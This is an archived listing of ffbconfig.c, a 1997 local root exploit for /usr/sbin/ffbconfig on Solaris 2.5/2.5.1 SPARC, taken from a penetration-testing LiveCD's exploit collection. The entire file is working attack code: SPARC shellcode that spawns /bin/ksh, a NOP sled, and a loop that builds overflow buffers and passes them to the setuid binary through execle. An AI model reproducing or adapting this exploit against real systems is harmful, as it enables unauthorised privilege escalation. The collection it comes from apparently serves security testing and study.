home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / ffbconfig.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  55 lines

  1. /*## copyright LAST STAGE OF DELIRIUM dec 1997 poland        *://lsd-pl.net/ #*/
  2. /*## /usr/sbin/ffbconfig                                                     #*/
  3.  
  4. #define NOPNUM 4000
  5. #define ADRNUM 360
  6. #define ALLIGN 2
  7.  
  8. char shellcode[]=
  9.     "\x20\xbf\xff\xff"     /* bn,a    <shellcode-4>        */
  10.     "\x20\xbf\xff\xff"     /* bn,a    <shellcode>          */
  11.     "\x7f\xff\xff\xff"     /* call    <shellcode+4>        */
  12.     "\x90\x03\xe0\x20"     /* add     %o7,32,%o0           */
  13.     "\x92\x02\x20\x10"     /* add     %o0,16,%o1           */
  14.     "\xc0\x22\x20\x08"     /* st      %g0,[%o0+8]          */
  15.     "\xd0\x22\x20\x10"     /* st      %o0,[%o0+16]         */
  16.     "\xc0\x22\x20\x14"     /* st      %g0,[%o0+20]         */
  17.     "\x82\x10\x20\x0b"     /* mov     0xb,%g1              */
  18.     "\x91\xd0\x20\x08"     /* ta      8                    */
  19.     "/bin/ksh"
  20. ;
  21.  
  22. char jump[]=
  23.     "\x81\xc3\xe0\x08"     /* jmp     %o7+8                */
  24.     "\x90\x10\x00\x0e"     /* mov     %sp,%o0              */
  25. ;
  26.  
  27. static char nop[]="\x80\x1c\x40\x11";
  28.  
  29. main(int argc,char **argv){
  30.     char buffer[10000],adr[4],*b,*envp[2];
  31.     int i;
  32.  
  33.     printf("copyright LAST STAGE OF DELIRIUM dec 1997 poland  //lsd-pl.net/\n");
  34.     printf("/usr/sbin/ffbconfig for solaris 2.5 2.5.1 sparc\n\n");
  35.  
  36.     *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+6584+2000;
  37.  
  38.     envp[0]=&buffer[0];
  39.     envp[1]=0;
  40.  
  41.     b=&buffer[0];
  42.     sprintf(b,"xxx=");
  43.     b+=4;
  44.     for(i=0;i<ALLIGN;i++) *b++=0xff;
  45.     for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
  46.     for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
  47.     *b=0;
  48.  
  49.     b=&buffer[5000];
  50.     for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
  51.     *b=0;
  52.  
  53.     execle("/usr/sbin/ffbconfig","lsd","-dev",&buffer[5000],0,envp);
  54. }
  55. /*                    www.hack.co.za           [5 August 2000]*/